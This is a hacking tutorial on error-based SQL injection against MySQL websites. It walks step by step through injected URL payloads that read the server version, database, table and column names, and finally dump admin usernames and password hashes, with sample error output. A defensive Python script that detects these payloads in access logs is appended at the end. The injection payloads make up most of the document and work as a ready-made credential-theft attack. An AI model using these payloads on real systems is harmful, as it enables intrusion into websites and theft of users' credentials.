Error Based
By injecting a specific query (I will show you this later in the tutorial), we
get an error message returned in the page.
This message actually gives us sensitive database information. That's why we call
this error-based SQL injection.
Determine when we should use error or double query injection.
When you switch over to union select statements and the page returns an error
saying something like:
Case 1: The used select statements have different number of columns.
Case 2: Unknown column 1.
Case 3: Nothing returns at all, and you can't find the columns on the web content.
Then you can also use error-based injection.
These are the most common cases when we can use error-based and double query
injection.
Now that we know when to use this and you have a page with a case like that,
let's move on!
Get the MySQL Version.
The query to get the MySQL version for error based injection is:
+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
In URL:
http://www.[site].com/page.php?id=1+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--
What does this line of code actually say?
We need to group by concat_ws because this concat allows us to inject more than
one statement at a time.
In this case we inject a colon (0x3a) and the version. All the other stuff is there to
actually retrieve the info in our error message.
Returned error message:
Duplicate entry '~'5.1.41'~1' for key 1
This means this Web Page has MySQL version 5.1.41.
Get the Database Name
To get the database name it's already a little more complicated.
First of all there can be more than one database on a server. I'll explain how
to find those as well!
The Query to get database names:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Look closely at this query! Look for limit 0,1. This is how we find more
databases inside a server.
Edit 0,1 to 1,1 and keep increasing (2,1 and further) until you don't see
any changes any more.
That way you know you got all databases. Put those in a notepad; you will need
the first one later on in this tutorial.
What does this query tell us?
In concat we can select more than one statement, as I said before with the
version. This way we now select the database name using a method called cast.
You will be seeing more about cast as you advance in SQL injection. We say we
want to get the database (as char), in characters, from information_schema, which
is the database.
Duplicate entry '~'Ignotus_1' for key 1
That means our database name is Ignotus_1.
When I increased the limit nothing changed, meaning we have only one database.
Write down that database name; you will be needing it.
Get the Table Names
Now we are getting somewhere; we need the more difficult stuff: getting the
table names.
Be sure to use the hackbar because it really eases your work.
The Query to get the Table names:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Yet again I use the limit function here. Only that way can you get all tables
using error-based injection.
By increasing that limit as previously explained you will find them all.
As I said in my first tutorial, always look for useful tables: admin tables,
members tables, users, anything to do with user credentials is interesting.
For black hats, probably shop tables or payment sections are interesting as well,
but I don't want to support black hatting!
What does this extremely large query tell us?
Using the select in the concat method again, and with casting table_name as
characters, we ask for the table name from the information_schema (database).
That's the easiest explanation I can possibly give.
For limit 0,1:
Duplicate entry '~'tbl_news' for key 1
For limit 1,1:
Duplicate entry '~'tbl_gallery' for key 1
For limit 2,1:
Duplicate entry '~'tbl_userAdmins' for key 1
Finally something useful: tbl_userAdmins.
Now that we have ourselves an interesting table we want to extract information
out of it.
Get the Column Names
Yet another step further; this won't get any easier. And this is still regular
error based, people.
SQL injection is hard, you need your brains!
The query to extract the column names from tables:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLENAMEHERE+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
It is important to look at this code:
where it says TABLENAMEHERE we need to put our table name in hex. Be sure that 0x is
in front so the MySQL server knows what it is.
In the hackbar go over to Encoding and choose "encode in hex" first. Or
go to the following site and put the table name where it says "Say hello to
my little friend": http://www.swingnote.com/tools/texttohex.php.
There is also a limit behind our hex.
We are going to need this limit to successfully extract all columns.
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLENAMEHERE+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Now what does our query tell us?
We select the column_name using cast and want it returned in characters using
as char, from the database but this time also from the table,
the one we put there in hex. And with a limit to get all the different columns
in there.
Now my first error is:
Duplicate entry 'admin_NAME' for key 1
That will get us the admin name column we need. If you haven't got that, just increase
the limit.
Now I need my next column; I need the passwords of course. For the sake of
simplicity that's my next one.
Error code:
Duplicate entry 'admin_PWD' for key 1
Now we finally get on to the fun part where we get our admin / PWD!!
Extracting Information from the Columns
Everyone likes this part! The part where we finally get to something!
Anyway, I have to tell you this is only half of the tutorial. We only covered
error based. Double query is beyond this part.
(Beware: where it says admin_NAME and admin_PWD you have to
replace them with the username and password columns you extracted before!
Also where it says tbl_userAdmins put the table name you
extracted the columns from.
Almost forgot the database name, did ya?? Well this is where you need it.
Where it says Ignotus_1 is where you put the database
name.)
Our Query to extract information:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(admin_NAME,0x7e,admin_PWD)+as+char),0x7e))+from+Ignotus_1.tbl_userADMINS+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
In URL:
http://www.[site].com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(admin_NAME,0x7e,admin_PWD)+as+char),0x7e))+from+Ignotus_1.tbl_userADMINS+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
What does this query tell us?
We select using concat and cast: selecting admin_NAME, 0x7e (the tilde separator) and
admin_PWD, to put the admin name and admin password together in our error message,
as char (in characters) from the database (Ignotus_1) and the table
tbl_userADMINS.
Our error MSG:
Duplicate entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1
Congratulations, you successfully injected a website vulnerable to error-based SQL
injection. (Mouthful!)
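From the defender's side, every query in this tutorial shares one fingerprint: a GROUP BY on an expression containing floor(rand(0)*2), which is what forces the "Duplicate entry" error. The following Python triage script is an added example (not part of the original tutorial) that scans web-server access-log lines for that fingerprint, classifies which stage of the walkthrough a request belongs to, pulls out the LIMIT offset being enumerated, and decodes any hex-encoded table name. The log lines, client IP and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not from the original post); the payloads
# mirror the version and column-name queries walked through in the tutorial.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /page.php?id=1+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1-- HTTP/1.1" 200 612
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c5f7573657241646d696e73+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 200 598
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
GROUP_BY_RE = re.compile(r"group\s+by", re.I)
# What the request is enumerating; checked in order, first match wins.
STAGES = [("version", re.compile(r"version\(\)", re.I)),
          ("database_name", re.compile(r"cast\(database\(\)", re.I)),
          ("table_names", re.compile(r"cast\(table_name", re.I)),
          ("column_names", re.compile(r"cast\(column_name", re.I))]
LIMIT_RE = re.compile(r"limit\s+(\d+)\s*,\s*1", re.I)          # row offset being walked
HEX_RE = re.compile(r"0x((?:[0-9a-f]{2}){2,})", re.I)          # 2+ whole bytes; skips 0x7e/0x3a
SOURCE_RE = re.compile(r"from\s+([A-Za-z_][\w.]*)\s+limit", re.I)  # db.table being read


def analyze_request(path):
    """Return a triage record for an error-based SQLi payload, or None if benign."""
    query = unquote_plus(urlsplit(path).query)
    # The duplicate-key trick always pairs GROUP BY with floor(rand(0)*2).
    if "floor(rand(0)*2)" not in query.lower() or not GROUP_BY_RE.search(query):
        return None
    stage = next((name for name, rx in STAGES if rx.search(query)), "data_extraction")
    limit, source = LIMIT_RE.search(query), SOURCE_RE.search(query)
    return {"stage": stage,
            "offset": int(limit.group(1)) if limit else None,
            "source": source.group(1) if source else None,
            "hex_literals": [bytes.fromhex(h).decode("ascii", "replace")
                             for h in HEX_RE.findall(query)]}


def scan_log(text):
    """Return (client_ip, finding) for every flagged request in an access log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        finding = analyze_request(m.group(1)) if m else None
        if finding:
            findings.append((line.split(" ", 1)[0], finding))
    return findings


if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(ip, finding)
```

Running it over the sample log flags the version probe and a column-name probe at offset 2 against the decoded table tbl_userAdmins, which is the kind of record an incident responder needs to reconstruct what was read.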